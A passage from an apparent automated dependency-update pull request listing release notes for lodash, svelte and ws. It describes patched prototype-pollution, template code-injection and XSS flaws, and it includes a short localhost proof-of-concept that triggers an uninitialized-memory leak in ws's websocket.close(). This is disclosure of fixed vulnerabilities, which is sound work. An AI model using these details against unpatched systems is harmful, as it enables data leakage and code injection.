href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.19 to 5.55.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.7\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent XSS on \u003ccode\u003ehydratable\u003c/code\u003e from user contents (\u003ca href=\"https://github.com/sveltejs/svelte/commit/a16ebc67bbcf8f708360195687e1b2719463e1a4\"\u003e\u003ccode\u003ea16ebc67bbcf8f708360195687e1b2719463e1a4\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: bump devalue (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18219\"\u003e#18219\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: disallow empty attribute names during SSR (\u003ca href=\"https://github.com/sveltejs/svelte/commit/547853e2406a2147ad7fb5ffeba95b01bd9642da\"\u003e\u003ccode\u003e547853e2406a2147ad7fb5ffeba95b01bd9642da\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: harden regex (\u003ca href=\"https://github.com/sveltejs/svelte/commit/d2375e2ebcab5c88feb5652f1a9d621b8f06b259\"\u003e\u003ccode\u003ed2375e2ebcab5c88feb5652f1a9d621b8f06b259\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: move Svelte runtime properties to symbols (\u003ca href=\"https://github.com/sveltejs/svelte/commit/e1cbbd96441e82c9eb8a23a2903c0d06d3cda991\"\u003e\u003ccode\u003ee1cbbd96441e82c9eb8a23a2903c0d06d3cda991\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.6\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: leave stale promises to wait for a later resolution, instead of rejecting (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18180\"\u003e#18180\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: keep dependencies of \u003ccode\u003e$state.eager/pending\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18218\"\u003e#18218\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reapply context after transforming error during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18099\"\u003e#18099\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't rebase just-created batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18117\"\u003e#18117\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: allow \u003ccode\u003enull\u003c/code\u003e for \u003ccode\u003epending\u003c/code\u003e in typings (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18201\"\u003e#18201\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: flush eager effects in production (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18107\"\u003e#18107\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: rethrow error of failed iterable after calling \u003ccode\u003ereturn()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18169\"\u003e#18169\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: account for proxified instance when updating \u003ccode\u003ebind:this\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18147\"\u003e#18147\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: ensure scheduled batch is flushed if not obsolete (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18131\"\u003e#18131\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resolve stale deriveds with latest value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18167\"\u003e#18167\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: remove unnecessary \u003ccode\u003eincrement_pending\u003c/code\u003e calls (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18183\"\u003e#18183\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly compile component member expressions for SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18192\"\u003e#18192\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reset \u003ccode\u003esource.updated\u003c/code\u003e stack traces after \u003ccode\u003eflush\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18196\"\u003e#18196\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: replacing async 'blocking' strategy with 'merging' (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18205\"\u003e#18205\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e@debug\u003c/code\u003e tags to reference awaited variables (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18138\"\u003e#18138\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: re-run fallback props if dependencies update (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18146\"\u003e#18146\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: abort running obsolete async branches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18118\"\u003e#18118\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.7\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent XSS on \u003ccode\u003ehydratable\u003c/code\u003e from user contents (\u003ca href=\"https://github.com/sveltejs/svelte/commit/a16ebc67bbcf8f708360195687e1b2719463e1a4\"\u003e\u003ccode\u003ea16ebc67bbcf8f708360195687e1b2719463e1a4\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: bump devalue (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18219\"\u003e#18219\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: disallow empty attribute names during SSR (\u003ca href=\"https://github.com/sveltejs/svelte/commit/547853e2406a2147ad7fb5ffeba95b01bd9642da\"\u003e\u003ccode\u003e547853e2406a2147ad7fb5ffeba95b01bd9642da\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: harden regex (\u003ca href=\"https://github.com/sveltejs/svelte/commit/d2375e2ebcab5c88feb5652f1a9d621b8f06b259\"\u003e\u003ccode\u003ed2375e2ebcab5c88feb5652f1a9d621b8f06b259\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: move Svelte runtime properties to symbols (\u003ca href=\"https://github.com/sveltejs/svelte/commit/e1cbbd96441e82c9eb8a23a2903c0d06d3cda991\"\u003e\u003ccode\u003ee1cbbd96441e82c9eb8a23a2903c0d06d3cda991\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.6\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: leave stale promises to wait for a later resolution, instead of rejecting (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18180\"\u003e#18180\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: keep dependencies of \u003ccode\u003e$state.eager/pending\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18218\"\u003e#18218\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reapply context after transforming error during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18099\"\u003e#18099\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't rebase just-created batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18117\"\u003e#18117\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: allow \u003ccode\u003enull\u003c/code\u003e for \u003ccode\u003epending\u003c/code\u003e in typings (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18201\"\u003e#18201\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: flush eager effects in production (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18107\"\u003e#18107\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: rethrow error of failed iterable after calling \u003ccode\u003ereturn()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18169\"\u003e#18169\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: account for proxified instance when updating \u003ccode\u003ebind:this\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18147\"\u003e#18147\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: ensure scheduled batch is flushed if not obsolete (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18131\"\u003e#18131\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resolve stale deriveds with latest value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18167\"\u003e#18167\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: remove unnecessary \u003ccode\u003eincrement_pending\u003c/code\u003e calls (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18183\"\u003e#18183\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly compile component member expressions for SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18192\"\u003e#18192\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: reset \u003ccode\u003esource.updated\u003c/code\u003e stack traces after \u003ccode\u003eflush\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18196\"\u003e#18196\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: replacing async 'blocking' strategy with 'merging' (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18205\"\u003e#18205\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e@debug\u003c/code\u003e tags to reference awaited variables (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18138\"\u003e#18138\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: re-run fallback props if dependencies update (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18146\"\u003e#18146\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/4d8f99a2709e3c02e48d8bc6c77458f4ba49d0e3\"\u003e\u003ccode\u003e4d8f99a\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18220\"\u003e#18220\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/05523088173e10af0753877af6936088de924833\"\u003e\u003ccode\u003e0552308\u003c/code\u003e\u003c/a\u003e chore: bump devalue (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18219\"\u003e#18219\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e1cbbd96441e82c9eb8a23a2903c0d06d3cda991\"\u003e\u003ccode\u003ee1cbbd9\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/a16ebc67bbcf8f708360195687e1b2719463e1a4\"\u003e\u003ccode\u003ea16ebc6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d2375e2ebcab5c88feb5652f1a9d621b8f06b259\"\u003e\u003ccode\u003ed2375e2\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/547853e2406a2147ad7fb5ffeba95b01bd9642da\"\u003e\u003ccode\u003e547853e\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/55f9c85c09d625c3dd80c71ce7542f57386fafb4\"\u003e\u003ccode\u003e55f9c85\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18158\"\u003e#18158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/a10e8e47a5946623a60a1e36b9023c23926eae87\"\u003e\u003ccode\u003ea10e8e4\u003c/code\u003e\u003c/a\u003e fix: keep dependencies of \u003ccode\u003e$state.eager\u003c/code\u003e/\u003ccode\u003epending\u003c/code\u003e (alternative approach) (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ef4b97dfabfd7a23b27933e18f7393587c343d66\"\u003e\u003ccode\u003eef4b97d\u003c/code\u003e\u003c/a\u003e fix: duplicated \u0026quot;of\u0026quot; in events.js comment (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18217\"\u003e#18217\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/5122936edb3c14e9a602e579727479b49cbd3239\"\u003e\u003ccode\u003e5122936\u003c/code\u003e\u003c/a\u003e fix: treat batches as a linked list (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18205\"\u003e#18205\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.55.7/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 8.17.1 to 8.20.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.20.1\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an uninitialized memory disclosure issue in \u003ccode\u003ewebsocket.close()\u003c/code\u003e\n(c0327ec1).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eProviding a \u003ccode\u003eTypedArray\u003c/code\u003e (e.g. \u003ccode\u003eFloat32Array\u003c/code\u003e) as the \u003ccode\u003ereason\u003c/code\u003e argument for\n\u003ccode\u003ewebsocket.close()\u003c/code\u003e, rather than the supported string or \u003ccode\u003eBuffer\u003c/code\u003e types, caused\nuninitialized memory to be disclosed to the remote peer.\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { deepStrictEqual } from 'node:assert';\r\nimport { WebSocket, WebSocketServer } from 'ws';\r\n\u003cp\u003econst wss = new WebSocketServer(\n{ port: 0, skipUTF8Validation: true },\nfunction () {\nconst { port } = wss.address();\nconst ws = new WebSocket(\u003ccode\u003ews://localhost:${port}\u003c/code\u003e, {\nskipUTF8Validation: true\n});\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003ews.on('close', function (code, reason) {\r\n  deepStrictEqual(reason, Buffer.alloc(80));\r\n});\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e}\n);\u003c/p\u003e\n\u003cp\u003ewss.on('connection', function (ws) {\nws.close(1000, new Float32Array(20));\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eThe issue was privately reported by \u003ca href=\"https://github.com/ChALkeR\"\u003eNikita Skovoroda\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e8.20.0\u003c/h2\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded exports for the \u003ccode\u003ePerMessageDeflate\u003c/code\u003e class and utilities for the\n\u003ccode\u003eSec-WebSocket-Extensions\u003c/code\u003e and \u003ccode\u003eSec-WebSocket-Protocol\u003c/code\u003e headers (d3503c1f).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.19.0\u003c/h2\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003ecloseTimeout\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/websockets/ws/issues/2308\"\u003e#2308\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eHandled a forthcoming breaking change in Node.js core (19984854).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5d9b316230ea931532a6671cc450f18c11edd02f\"\u003e\u003ccode\u003e5d9b316\u003c/code\u003e\u003c/a\u003e [dist] 8.20.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086\"\u003e\u003ccode\u003ec0327ec\u003c/code\u003e\u003c/a\u003e [security] Fix uninitialized memory disclosure in \u003ccode\u003ewebsocket.close()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 